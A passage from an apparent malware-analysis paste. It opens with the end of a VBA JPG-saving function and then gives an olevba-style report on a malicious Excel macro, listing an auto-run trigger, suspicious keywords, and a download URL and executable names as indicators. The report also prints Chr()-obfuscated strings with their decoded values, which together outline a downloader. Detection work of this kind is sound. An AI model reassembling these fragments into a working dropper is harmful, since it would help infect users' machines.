  602.     ReDim EncParams(Len(Params) - 1)
  603.     CopyMemory EncParams(0), Params, Len(Params)
  604.     GdipCreateBitmapFromHBITMAP Pic, 0, Image
  605.     SavePicToJPG = GdipSaveImageToFile(Image, StrPtr(Path), GetImageEncoderClsid(JPG), EncParams(0))
  606.     GdipDisposeImage Image
  607.     Erase EncParams
  608. End Function
  609.  
  610. +------------+----------------------+-----------------------------------------+
  611. | Type       | Keyword              | Description                             |
  612. +------------+----------------------+-----------------------------------------+
  613. | AutoExec   | Workbook_Open        | Runs when the Excel Workbook is opened  |
  614. | Suspicious | Open                 | May open a file                         |
  615. | Suspicious | CreateObject         | May create an OLE object                |
  616. | Suspicious | Chr                  | May attempt to obfuscate specific       |
  617. |            |                      | strings                                 |
  618. | Suspicious | SaveToFile           | May create a text file                  |
  619. | Suspicious | Write                | May write to a file (if combined with   |
  620. |            |                      | Open)                                   |
  621. | Suspicious | Shell                | May run an executable file or a system  |
  622. |            |                      | command (obfuscation: VBA expression)   |
  623. | Suspicious | Shell.Application    | May run an application (if combined     |
  624. |            |                      | with CreateObject) (obfuscation: VBA    |
  625. |            |                      | expression)                             |
  626. | Suspicious | ADODB.Stream         | May create a text file (obfuscation:    |
  627. |            |                      | VBA expression)                         |
  628. | Suspicious | Microsoft.XMLHTTP    | May download files from the Internet    |
  629. |            |                      | (obfuscation: VBA expression)           |
  630. | Suspicious | Hex Strings          | Hex-encoded strings were detected, may  |
  631. |            |                      | be used to obfuscate strings (option    |
  632. |            |                      | --decode to see all)                    |
  633. | Suspicious | Base64 Strings       | Base64-encoded strings were detected,   |
  634. |            |                      | may be used to obfuscate strings        |
  635. |            |                      | (option --decode to see all)            |
  636. | Suspicious | VBA obfuscated       | VBA string expressions were detected,   |
  637. |            | Strings              | may be used to obfuscate strings        |
  638. |            |                      | (option --decode to see all)            |
  639. | IOC        | imginfo.exe          | Executable file name                    |
  640. | IOC        | http://agridiotiko.c | URL (obfuscation: VBA expression)       |
  641. |            | om                   |                                         |
  642. | IOC        | zzA.exe              | Executable file name (obfuscation: VBA  |
  643. |            |                      | expression)                             |
  644. | IOC        | 4535.exe             | Executable file name (obfuscation: VBA  |
  645. |            |                      | expression)                             |
  646. | VBA string | Microsoft.XMLHTTP    | (Chr(77) & Chr(105) & "c" & Chr(114) &  |
  647. |            |                      | Chr(111) & Chr(115) & Chr(111) &        |
  648. |            |                      | Chr(102) & "t" & Chr(46) & Chr(88) &    |
  649. |            |                      | "M" & Chr(76) & "H" & Chr(84) & Chr(84) |
  650. |            |                      | & "P")                                  |
  651. | VBA string | WScript              | Chr(87) & Chr(80 + 3) & Chr(99) &       |
  652. |            |                      | Chr(114) & Chr(105) & Chr(112) &        |
  653. |            |                      | Chr(116)                                |
  654. | VBA string | hell                 | Chr(104) & Chr(101) & Chr(108) &        |
  655. |            |                      | Chr(108)                                |
  656. | VBA string | Process              | (Chr(80) & Chr(114) & "o" & Chr(99) &   |
  657. |            |                      | Chr(101) & "s" & "s")                   |
  658. | VBA string | TEMP                 | ("T" & Chr(69) & Chr(77) & Chr(80))     |
  659. | VBA string | Adodb.Stream         | (Chr(65) & "do" & Chr(100) & Chr(98) &  |
  660. |            |                      | Chr(46) & Chr(83) & Chr(116) & Chr(114) |
  661. |            |                      | & Chr(101) & "a" & Chr(109))            |
  662. | VBA string | \zzA.exe             | "\" & "zz" & Chr(65) & "." & "e" &      |
  663. |            |                      | Chr(120) & "e"                          |
  664. | VBA string | ;<=Shell.Application | (";<=" + Chr(83) & "h" & "e" & Chr(108) |
  665. |            |                      | & Chr(108) & Chr(46) & Chr(65) & "p" &  |
  666. |            |                      | Chr(112) & Chr(108) & Chr(105) &        |
  667. |            |                      | Chr(99) & Chr(97) & Chr(116) & Chr(105) |
  668. |            |                      | & Chr(111) & Chr(110))                  |
  669. | VBA string | http://agridiotiko.c | Chr(104) & Chr(116) & "t" & Chr(112) &  |
  670. |            | om                   | Chr(58) & "/" & "/" & Chr(97) &         |
  671. |            |                      | Chr(103) & "r" & Chr(105) & "d" & "i" & |
  672. |            |                      | Chr(111) & Chr(116) & "i" & "k" & "o" & |
  673. |            |                      | Chr(46) & "c" & Chr(111) & "m"          |
  674. | VBA string | GET                  | Chr(71) & "E" & Chr(84)                 |
  675. | VBA string | /432/4535.exe        | "/" & Chr(52) & "3" & Chr(50) & Chr(47) |
  676. |            |                      | & "4" & Chr(53) & Chr(51) & Chr(53) &   |
  677. |            |                      | Chr(46) & "e" & Chr(120) & "e"          |
  678. +------------+----------------------+-----------------------------------------+